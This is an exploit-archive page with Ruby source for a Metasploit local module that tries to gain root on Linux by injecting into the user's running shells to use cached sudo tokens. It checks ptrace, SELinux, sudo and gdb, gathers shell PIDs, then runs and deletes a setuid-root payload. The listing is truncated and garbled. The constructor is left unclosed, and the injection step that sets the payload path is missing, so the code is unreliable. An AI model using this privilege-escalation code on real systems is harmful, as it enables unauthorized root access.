Exploits / Vulnerability Discovered : 2019-09-03 |
Type : local |
Platform : linux
This exploit / vulnerability, Ptrace sudo token privilege escalation (metasploit), is for educational purposes only; if you use it, you do so at your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
# NOTE(review): the page's copy of this constructor is truncated. The
# Description %q{ literal and the update_info(...) call are still open when
# `def upload` begins below, and the remaining module metadata is not shown.
# Refer to the upstream module for the complete definition.
def initialize(info = {})
super(update_info(info,
'Name' => 'ptrace Sudo Token Privilege Escalation',
'Description' => %q{
This module attempts to gain root privileges by blindly injecting into
the session user's running shell processes and executing commands by
calling `system()`, in the hope that the process has valid cached sudo
tokens with root privileges.
The system must have gdb installed and permit ptrace.
# Write a file to the target and schedule it for removal at cleanup.
#
# Any existing file at +path+ is removed first, then +data+ is written and
# the path is registered with FileDropper so it is deleted when the module
# cleans up after itself.
#
# @param path [String] destination path on the target
# @param data [String] contents to write (String#size counts characters, so
#   the "bytes" figure in the status line is exact only for binary/ASCII data)
def upload(path, data)
  byte_count = data.size
  print_status "Writing '#{path}' (#{byte_count} bytes) ..."
  rm_f(path)
  write_file(path, data)
  register_file_for_cleanup(path)
end
# Evaluate the preconditions the technique relies on and return a check
# verdict. Each precondition is reported verbosely as it is evaluated; the
# first one that fails short-circuits to CheckCode::Safe.
#
# Order: YAMA ptrace scope not restrictive, SELinux deny_ptrace not enabled
# (only consulted when /usr/sbin/getsebool exists), sudo installed, gdb
# installed.
#
# @return [Msf::Exploit::CheckCode] Safe when any precondition fails,
#   Detected when all hold. The method never confirms that a cached sudo
#   token actually exists, so it never reports Vulnerable.
def check
  # Report one precondition verbosely; returns true when it blocks the technique.
  blocked = lambda do |blocking, blocked_msg, clear_msg|
    if blocking
      vprint_error blocked_msg
    else
      vprint_good clear_msg
    end
    blocking
  end

  return CheckCode::Safe if blocked.call(yama_enabled?, 'YAMA ptrace scope is restrictive', 'YAMA ptrace scope is not restrictive')

  if command_exists? '/usr/sbin/getsebool'
    # NOTE: `2>1` here sends getsebool's stderr to a file literally named "1"
    # in the session's working directory rather than to stdout; the command
    # is reproduced verbatim.
    deny_ptrace = cmd_exec("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on && echo true").to_s.include? 'true'
    return CheckCode::Safe if blocked.call(deny_ptrace, 'SELinux deny_ptrace is enabled', 'SELinux deny_ptrace is disabled')
  end

  # Required tooling: [binary, message when missing, message when present]
  [
    ['sudo', 'sudo is not installed', 'sudo is installed'],
    ['gdb', 'gdb is not installed', 'gdb is installed']
  ].each do |binary, missing_msg, present_msg|
    return CheckCode::Safe if blocked.call(!command_exists?(binary), missing_msg, present_msg)
  end

  CheckCode::Detected
end
# Entry point. Validates the prerequisites from check(), enumerates the
# session user's running shell processes, and reports success only when a
# setuid-root copy of the payload is reported at @payload_path; otherwise
# fails with NoAccess.
#
# NOTE(review): this listing is incomplete. Between the `pids.empty?` guard
# and the `print_good` call nothing is shown, although that is where
# @payload_path would have to be assigned and where the construct closed by
# the later `return` / `end` pair must open (presumably the per-process
# injection step the module's Description refers to). Treat this copy as a
# fragment and consult the upstream module for the real control flow.
def exploit
  # Prerequisite gate: check() must return Detected unless the operator set
  # ForceExploit, which downgrades the failure to a warning.
  unless check == CheckCode::Detected
    unless datastore['ForceExploit']
      fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
    end
    print_warning 'Target does not appear to be vulnerable'
  end

  # Nothing to escalate if the session is already root (again overridable).
  if is_root?
    unless datastore['ForceExploit']
      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
    end
  end

  # base_dir is a helper defined elsewhere (its value is not visible here).
  # It must be writable and not on a nosuid mount, since the success message
  # below reports a setuid-root payload located there.
  unless writable? base_dir
    fail_with Failure::BadConfig, "#{base_dir} is not writable"
  end
  if nosuid? base_dir
    fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
  end

  # Collect PIDs of running shells owned by the session user. `shells` is a
  # helper defined elsewhere, presumably a list of shell basenames. The pgrep
  # path anchors the name regex and filters by the current uid; the fallback
  # queries pidof once per shell name.
  print_status 'Searching for shell processes ...'
  pids = []
  if command_exists? 'pgrep'
    cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
      pids << pid.strip
    end
  else
    shells.each do |s|
      pidof(s).each {|p| pids << p.strip}
    end
  end
  if pids.empty?
    fail_with Failure::Unknown, 'Found no running shell processes'
  end

  # --- listing gap: the page omits the lines that open the construct closed
  # by the `end` after `return` below and that assign @payload_path ---

    # Success path: the payload at @payload_path is started in the background
    # and whatever the shell echoes back is printed verbosely before returning.
    print_good "#{@payload_path} setuid root successfully"
    print_status 'Executing payload...'
    res = cmd_exec "#{@payload_path} & echo "
    vprint_line res
    return
  end

  # Reached only when no shell process yielded a setuid-root payload.
  fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
end
# Session callback: remove the dropped payload from the target once a session
# has been established, using the Meterpreter file API when available and a
# shell `rm -f` otherwise, then hand off to the parent implementation.
#
# @param session [Msf::Session] the session that was just created
def on_new_session(session)
  # Non-Meterpreter sessions only have a shell to work with.
  return session.shell_command_token("rm -f '#{@payload_path}'") unless session.type.eql?('meterpreter')

  # stdapi provides the filesystem API; load it if this session lacks it.
  session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
  session.fs.file.rm(@payload_path)
ensure
  # Runs on every path, including the early return above.
  super
end
end